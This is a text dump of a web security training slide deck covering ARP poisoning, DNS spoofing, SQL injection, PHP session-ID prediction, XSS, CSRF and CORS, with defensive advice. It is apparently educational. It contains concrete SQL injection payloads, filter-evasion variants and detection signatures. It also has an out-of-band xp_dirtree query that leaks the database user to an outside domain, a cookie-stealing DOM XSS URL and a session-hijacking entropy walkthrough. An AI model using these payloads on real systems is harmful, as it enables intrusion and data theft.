Tweet
Tweet

Slide 1

Slide 1 text

Lets Abuse protect Web [Code best practices to stay safe] Krishantha Dinesh Msc, MIEEE, MBCS Software Architect www.krishantha.com www.youtube.com/krish @krishantha

Slide 2

Slide 2 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ • Audience have basic knowledge about Network / software developments / sql • Examples if any.. Those are just for learning purposes • Will not be teach any programming language • Audience have Good understanding about legal part of computer/cyber crimes 2 Assumptions

Slide 3

Slide 3 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Mutual agreement • Since objective of this session is to teach how to protect web application / system from attackers and protect self privacy.. any unintended usage of this learning will be completely responsible of the user. • Presenter will not be responsible for any damage , loss or legal issues can cause by misusing this learnings. • It is assumed that entire audience including who comes to the session after this slide are aware about the limitation and legal side of usage this learnings. 3

Slide 4

Slide 4 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ What is out-of-the-box 4

Slide 5

Slide 5 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Classic thinking 5

Slide 6

Slide 6 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Out-of-box thinking • Use simple formula 6

Slide 7

Slide 7 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Out-of-the-box 7

Slide 8

Slide 8 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Hacking???? What is that? • Hacking is the practice of modifying the features of a system, in order to accomplish a goal outside of the creator's original purpose. The person who is consistently engaging in hacking activities, and has accepted hacking as a lifestyle and philosophy of their choice, is called a hacker. 8

Slide 9

Slide 9 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Use SSL will save me? • What is SSL • 2 way SSL

Slide 10

Slide 10 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ What it is lets talk about web - www.krishantha.com

Slide 11

Slide 11 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Why SSL cannot protect idiots lets talk about web - www.krishantha.com

Slide 12

Slide 12 text

MTM attack

Slide 13

Slide 13 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ What is MITM attack? • One of the most prevalent network attacks used against individuals and large organizations • MITM works by establishing connections to victim machines and relaying messages between them • one victim believes it is communicating directly with another victim, when in reality the communication flows through the host performing the attack ( same as real world J ) • attacking host can not only intercept sensitive data, but can also inject and manipulate a data stream to gain further control of its victims 14

Slide 14

Slide 14 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ How can performed MITM attack? • There are many forms of MITM Attack • ARP Poisoning • DNS Spoofing • HTTP session Hijacking • Port stealing • ICMP redirection • SSL Hijacking 15

Slide 15

Slide 15 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ What is ARP? • The ARP protocol was designed out of necessity to facilitate the translation of addresses between the second and third layers of the OSI model. • Each layer has its own addressing scheme, and they must work together in order to make network communication happen • For above requirement ARP was created with RFC 826, “An Ethernet Address Resolution Protocol”. 16

Slide 16

Slide 16 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ ARP lets talk about web - www.krishantha.com

Slide 17

Slide 17 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Broadcasting all over lets talk about web - www.krishantha.com

Slide 18

Slide 18 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ One decide he has requested address lets talk about web - www.krishantha.com

Slide 19

Slide 19 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Building reply lets talk about web - www.krishantha.com

Slide 20

Slide 20 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Update own cache lets talk about web - www.krishantha.com

Slide 21

Slide 21 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Unicast reply to requester lets talk about web - www.krishantha.com

Slide 22

Slide 22 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Update ARP cache lets talk about web - www.krishantha.com

Slide 23

Slide 23 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ How ARP works in one page 24

Slide 24

Slide 24 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ How ARP works in real.… • ARP operation is centered around two packets, an ARP request and an ARP reply • Purpose of the request and reply are to locate the hardware MAC address associated with a given IP address • When 10.0.81.85 needs to contact 10.0.81.82 it send broadcast message as “who has 10.0.81.82 tell 10.0.81.85” • 10.0.81.82 will respond as “10.0.81.82 is at 1C-3E-84-8D-9C-53” 25

Slide 25

Slide 25 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ ARP Demo 26

Slide 26

Slide 26 text

ARP cache

Slide 27

Slide 27 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ How this compromised? • ARP cache poisoning takes advantage of the insecure nature of the ARP protocol • devices using ARP will accept updates at any time • This means that any device can send an ARP reply packet to another host and force that host to update its ARP cache with the new value • Sending an ARP reply when no request has been generated is called sending a gratuitous ARP • When malicious intent is present the result of a few well placed gratuitous ARP packets used in this manner can result in hosts who think they are communicating with one host, but in reality are communicating with a listening attacker 28

Slide 28

Slide 28 text

Poisoned network

Slide 29

Slide 29 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ How to defend 30 • arp –a will give you arp cache. Check for duplication entry • #avoid - Use static arp when possible arp –s • #detect - IDS

Slide 30

Slide 30 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ How DNS works lets talk about web - www.krishantha.com DNS Server DNS Server Krishantha.com I need to visit http://krishantha.com domain http://krishantha.com is not in my cache. Let me check other DNS Yep.. I have it. http://krishantha.com mapped to 69.65.3.251

Slide 31

Slide 31 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ DNS spoofing

Slide 32

Slide 32 text

SQL Injection

Slide 33

Slide 33 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ What is SQL Injection ??? • SQL Injection is one of the many web attack mechanisms used by hackers to steal data from organizations. It is perhaps one of the most common application layer attack techniques used today. It is the type of attack that takes advantage of improper coding of your web applications that allows hacker to inject SQL commands into say a login form to allow them to gain access to the data held within your database. • In essence, SQL Injection arises because the fields available for user input allow SQL statements to pass through and query the database directly. 34

Slide 34

Slide 34 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ How its worked • Lets think we have a app and in logging screen we check that use exist or not using following query. • SELECT * FROM tblUsers WHERE Name = $name AND Password = $password; • Means if user entered correct use name and password it will return data. Then we know user name and password are correct. Login allowed. • SELECT * FROM tblUsers WHERE Name = ‘Krish’ AND Password = ‘mypass’; 35

Slide 35

Slide 35 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Make database confuse… • We just need to think how to manipulate condition part of query • Go back to basics.. How is AND / OR operator works ?? • Use that • Enter “1 or 1=1 ;--” as login name .. The it will looks like • SELECT * FROM tblUsers WHERE Name = 1 or 1=1;-- AND Password = $password; • Since 1=1 true and rest ignored my commenting.. database will return everything 36

Slide 36

Slide 36 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Its more dangerous… • If someone send like this?? • SELECT * FROM tblUsers WHERE Name = ‘’; drop table tblUsers; -- AND Password = $password; • There are two queries. • First one will do nothing… • Second one will drop the table… 37

Slide 37

Slide 37 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ How can defend from this? • Usual answer is use prepared statement. • "SELECT * FROM `users` WHERE `username` = '?'“ which tell database about template. Now database knows only one value allowed 38

Slide 38

Slide 38 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Are we safe now? • Answer is NO.. But why??? • There are several ways to still track you. • There are 3 types of categorized which you get attacked • In-band • Out-of-band • Inferential 39

Slide 39

Slide 39 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ In-band • Data extract using same medium which used to inject the sql code • This is most common attack type. We can go with error base or union base • http://example.com/login.asp?id=1 or 1=convert(int,(USER))— • System will say • Syntax error converting nvarchar value ‘[sa]’ to a columns of data type int • Oh… database just told us what is the user name which application is used J 40

Slide 40

Slide 40 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Out-of-band • In this case response for the attack is comes in different way. • In previous response come right there in the screen. But this type response is come in different media.. May be email or sms or DNS or another. declare @k varchar(1024); set @k='master..xp_dirtree ''\\'+user_name()+'krishantha.com\x'''; exec(@k) 41

Slide 41

Slide 41 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ inferential • This is difficult one to do. If application returns the errors then it is easy to track. • But if application hides it error? Then you need to build logics to get some response from server • http://example.com/login.asp?id=1;if(select+system_user)+=+'sa'+waitfor+delay+'0:0 :15'-- • Means you ask question and check the behavior 42

Slide 42

Slide 42 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ your app is exposed? Penetration test • There are several scenarios we can use to extract data from system using sql injection. So in order to make sure your application is secured.. You need to test these scenarios with your application • Error base • String base • Integer base • Union base • Blind attack 43

Slide 43

Slide 43 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Error base Testing • http://example.com/login.asp?id=1 or 1=convert(int,(USER))— • Syntax error converting nvarchar value ‘[sa]’ to a columns of data type int • Like this you can get • USER • DB_NAME • @@servername • @@version 44

Slide 44

Slide 44 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Union based Test • http://example.com/login.asp?id=1 UNION ALL select 1-- • All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists • http://example.com/login.asp?id=1 UNION ALL select 1,2— • All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists • http://example.com/login.asp?id=1 UNION ALL select 1,2,3— • NO ERROR means ????? 45

Slide 45

Slide 45 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Blind attack test • http://example.com/login.asp?id=1; if(len(USER)=1) WAITFOR DELAY ‘00:00:15’-- • If page comes immediately now you know username is not an one character. So increase number and find number of characters. The find start with and so on…. 46

Slide 46

Slide 46 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Filters are good for defend? • Client side filtering • Its too bad. Anyone can save page and modify script and re-send • Attacker has full control for his browser. So no point of putting your security mechanism in browser • So is it a good idea for prevention? 47

Slide 47

Slide 47 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Control filtering • As we know we need to pass something like ‘id=2 or 1=1’ in order to make ‘true’ in sql query condition part. • So how we can avoid attack using control based validation • Make field only allowed for alpha numeric ??? • So I will send ‘id=2 or 1 like 1’ J • Is it successful ????? 48

Slide 48

Slide 48 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Signature base filtering • flow: to_server,established:content:" ' or 1=1 --“ • Then we use ‘id=2 or 1<2’ J • Best is filter not allowed digit after logical operand so it will not allowed 1=1 or 1<2 or 1 like 1 • Are we safe??? • How about ‘id=2 or 2=1+1’ • oOOOOOpppssss….. 49

Slide 49

Slide 49 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ What do we do??? • How about if we block any math/logics in conditional part??? • It will catch 2=1+1 • Now we safe?? • If I use this ??? ‘id=2/**/or/**/2/**/=/**/2—’ L 50

Slide 50

Slide 50 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Solution is block regex • flow:to_srver,established; pcre:"/(and|or)1=1(\-\-|\/\*|\#)/|“ • Thanks god now I am safe… • But………. • id=2 or 6+1+2=8+1%2D%2D • L L L L L L L L L L L L 51

Slide 51

Slide 51 text

Session Hijacking

Slide 52

Slide 52 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ What is this • Steal some once idea • Application uses many techniques to maintain session • We are going to analyze a cookie and generate something duplicate 53

Slide 53

Slide 53 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Sample model • Social network site • Developed using php and running with php sessions • Has facility to chat • Can upload images,status,notes and etc 54

Slide 54

Slide 54 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ If we considered php • Very common language for build website • PHP Session – common default session management • Its used by default most framework such as CakePHP, kohana, cakephp • Session pass via URL or … 55

Slide 55

Slide 55 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ How site knows you are authorized ? 56

Slide 56

Slide 56 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ What is http cookie ? • is a small piece of data sent from a website and stored in a user's web browser while the user is browsing that website. Every time the user loads the website, the browser sends the cookie back to the server to notify the website of the user's previous activity.[1] Cookies were designed to be a reliable mechanism for websites to remember stateful information (such as items in a shopping cart) or to record the user's browsing activity • (WIKI) 57

Slide 57

Slide 57 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Anatomy of PHP session • Session_start() • http://gcov.php.net/PHP_5_3/lcov_html/ext/session/session.c.gcov.php • spprintf(&buf, 0, "%.15s%ld%ld%0.8F", remote_addr ? remote_addr : "", // IP address 32 bits tv.tv_sec, //epoch 32 bits (long int)tv.tv_usec, //micro sec 32 bits php_combined_lcg(TSRMLS_C) * 10); // random long 64 bits • 160 bit total !!!! 58

Slide 58

Slide 58 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ 160 bit to tryout in normal path • 160 bit = 1,461,501,637,330,900,000,000,000,000,000,000,000,000,000,000,000 1 million Tx per second = 1,461,501,637,330,900,000,000,000,000,000,000,000,000,000 1 trillion Tx per second = 46,343,912,903,694,300,000,000,000,000 YERS to finish the attack forty-six octillion, three hundred forty-three septillion, nine hundred twelve sextillion, nine hundred three quintillion, six hundred ninety-four quadrillion, three hundred trillion YEARS.. LoL 59

Slide 59

Slide 59 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Out- of box thinking • Micro seconds are not really 32 bit. 1000 x 1000 micro seconds for second. So its 20 bit. (999,999) now total come down 148 bit • EPOCH.. How can avoid this…. • Facebook chat ??? Its says when u online.. How?? • Ajax calls… • Use http monitor like wireshark u can see back and forth traffic • It will tell SERVER TIME J so we discover the epoch which is 32 bit. • Now 116 bit J 60

Slide 60

Slide 60 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Out-of-box • When user is online send message with you web site • When user click that read apache log • Hurray….. Now we have • What ????? • IP ADDRESS other 32 bit • Now we need 84 bits 61

Slide 61

Slide 61 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Ou-of-box • Random LCG • LGC means Linear congruential generator • A linear congruential generator (LCG) is an algorithm that yields a sequence of pseudo-randomized numbers calculated with a linear equation. The method represents one of the oldest and best-known pseudorandom number generator algorithms.[1] The theory behind them is easy to understand, and they are easily implemented and fast, especially on computer hardware which can provide modulo arithmetic by storage-bit truncation. 62

Slide 62

Slide 62 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Ou-of-box 63

Slide 63

Slide 63 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Out-of-box • According to that it use dates • Yes we do not know that to micro second. But we know • Year , month , week , date J • So we reduce other 12 bits • S2 refer process id allocated 32 which is 15 long so can save other 17 bit • If u can execute php function you can save entire 32 bit J • So we save other 44 bits now we have only 40 bits 64

Slide 64

Slide 64 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Out-of-box • Now 40 bits mean we can attack within 12 hour J • If we use two processes to calculation it goes down to 30 minutes J 65

Slide 65

Slide 65 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ How to prevent • Create own keys on sessions • Do not use process id or system variables on keys • When use date use some algorithms to convert in to some other date 66

Slide 66

Slide 66 text

Cross site scripting (XSS)

Slide 67

Slide 67 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Why this happens • are hidden but executable • Usually HTML does not render tags. • If we have <script> inside HTML those will not show to user • So if someone add <script> to the site then visitor will not know that they are exposing something where they did not mean to.

Slide 68

Slide 68 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ JS (Java script) & History ● Released in 1995 from Netscape ● 1999 David Ross published paper “script injection” [inspired by Georgi Guninski] ● 2005 Samy Kamkar attacked myspace ● JS is a client-side processed scripting language So it can use to attack the user (client) ● General aim of the attack is Session Hijacking or Credentials Stealing o ex. Steal user cookie & use web app as them ● Can compromise the entire application through users

Slide 69

Slide 69 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ What it can do • stealing other user’s cookies / sessions • stealing others private information • performing actions on behalf of others • redirecting to other websites • Display alerts and messages •

Slide 70

Slide 70 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ How its works • Website allows users to send (POST) data to the website • Hackers use this to post their scripts • If website not validate those inputs website will execute those on other users • When script get execute hacker get the data they want

Slide 71

Slide 71 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ In action

Slide 72

Slide 72 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Type of attacks • Non-persistent • Persistent • DOM Based

Slide 73

Slide 73 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Non persistence • When XSS code only gets displayed in the next page to the same user and not gets saved into persistent storage like database. These are less vulnerable, because this only expose current data again its hackers.

Slide 74

Slide 74 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ CSRF Cross-site request forgery this use trusted authenticated user to execute unwanted code. As example lets think Bob log in to bank account and jack sent mail with a link and that link is the POST request which bank used to transfer money. When bop clicks on that link it use same session token which issued by the bank and it transfers money !!!!!

Slide 75

Slide 75 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Persistent XSS • In persistent type of XSS attack, XSS code gets saved into persistent storage like database with other data and then it is visible to other users also. One example of this kind of attacks is possible when user can submit comment so, where hacker can add their XSS code along with the comment text and if no validation or filtering is present on the server, XSS code can successfully saved into the database. • After this if anyone (other users) open the page into their browsers, XSS code can execute and can perform a variety of harmful actions. This type of attack is more vulnerable, because Hacker can steal cookies and can make modifications in the page. The risk with these kinds of attacks is any third party hacker can use this vulnerability to perform some actions on behalf of other users.

Slide 76

Slide 76 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ DOM based attacks DOM Based XSS (or type-0 XSS) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner.

Slide 77

Slide 77 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ DOM based attack example ● Expected URL in HTTP request, parameter decides default language to display o http://www.some.site/page.html?default=French ● Malicious URL o http://www.some.site/page.html?default=alert(document.cookie)

Slide 78

Slide 78 text

prevention

Slide 79

Slide 79 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ • Don’t to depends on client side JS validations • Do server side validations By sanitizing the input data, we can prevent the malicious code to enter in the system. Blacklists – Block and other attributes such as onload, onclick, onmouseover etc.

Slide 80

Slide 80 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ ● Recursive sanitization o When processing a client HTTP request or user supplied data it must be sanitized o Why recursive? § Wrapping commonly sanitized characters or sub-strings § ex. ipt> . . . ipt> becomes… § . . . ● Properly handle Encoding/Decoding o URL Encoding / Percent Encoding § One method attackers used to bypass literal character filtering is to encode known untrusted/dangerous characters (ex. %3C = ‘<’) o HTML Encoding / Decoding § Another method for bypassing these filters is to HTML encode those characters injected into the document to be decoded back into scripts when the page is rendered

Slide 81

Slide 81 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Follow the escape rules 5 Rules for escaping output #1 - HTML Escape before inserting into element content #2 - Attribute Escape before inserting into attributes #3 - JavaScript Escape before inserting into JavaScript data values #4 - CSS Escape before inserting into style property values #5 - URL Escape before inserting into URL attributes

Slide 82

Slide 82 text

Cross origin resource sharing CORS

Slide 83

Slide 83 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ • Cross-Origin Resource Sharing (CORS) [rfc6454 – web origin concept] is a mechanism that uses additional HTTP headers to tell browsers to give a web application running at one origin, access to selected resources from a different origin. A web application executes a cross-origin HTTP request when it requests a resource that has a different origin (domain, protocol, or port) from its own. • For security reasons, browsers restrict cross-origin HTTP requests initiated from scripts.

Slide 84

Slide 84 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Web document Domain: codelabs.lk Webserver Codelabs.lk Webserver Cosmos.codelabs.lk GET image1.png GET image2.png This handled by CORS

Slide 85

Slide 85 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Why we need to think about CORS • The web pages we visit make frequent requests to load assets like images, fonts, and more, from many different places across the Internet. If these requests for assets go unchecked, the security of the browser may be at risk. For example, our browser may be subject to hijacking, or our browser might blindly download malicious code. As a result, many modern browsers follow security policies to mitigate such risks.

Slide 86

Slide 86 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Same origin policy • The same-origin policy is very restrictive. Under this policy, a web page hosted on server X can only interact with other documents that are also on server X. In short, the same-origin policy enforces that documents that interact with each other have the same origin. • An origin is made up of the : the protocol, host, and port number. • From http://codelabs.lk/index.html • http://codelabs.lk/products.html is ALLOWED by same origin policy as origin is same (http+codelabs.lk+80) • http://cosmos.codelabs.lk/features.html is NOT ALLOWED as hostname is different.

Slide 87

Slide 87 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Why CORS is necessary ? • Mainly because no policy is very vulnerable and same origin policy is too restrictive. • It allows servers to specify not just who can access its assets, but also how the assets can be accessed. • Cross-origin requests are made using the standard HTTP request methods. Most servers will allow GET requests, meaning they will allow resources from external origins (say, a web page) to read their assets. HTTP requests methods like PATCH, PUT, or DELETE, however, may be denied to prevent malicious behavior. For many servers, this is intentional. For example, it is likely that server A does not want servers B, C, or D to edit or delete its assets. • With CORS, a server can specify who can access its assets and which HTTP request methods are allowed from external resources.

Slide 88

Slide 88 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ How it impose the security • It allows servers to specify not just who can access its assets, but also how the assets can be accessed. • As example codelabs.lk server can configure cosmos.codelabs.lk origin to GET resources from codelabs.lk but not allowed to POST,PUT,DELETE

Slide 89

Slide 89 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Cross origin policy • Unlike “simple origin policy” "pre-flighted" requests first send an HTTP request by the OPTIONS method to the resource on the other domain, to determine if the actual request is safe to send. Cross-site requests are pre-flighted like this since they may have implications to user data.

Slide 90

Slide 90 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Simple vs CORS

Slide 91

Slide 91 text

If any Q & A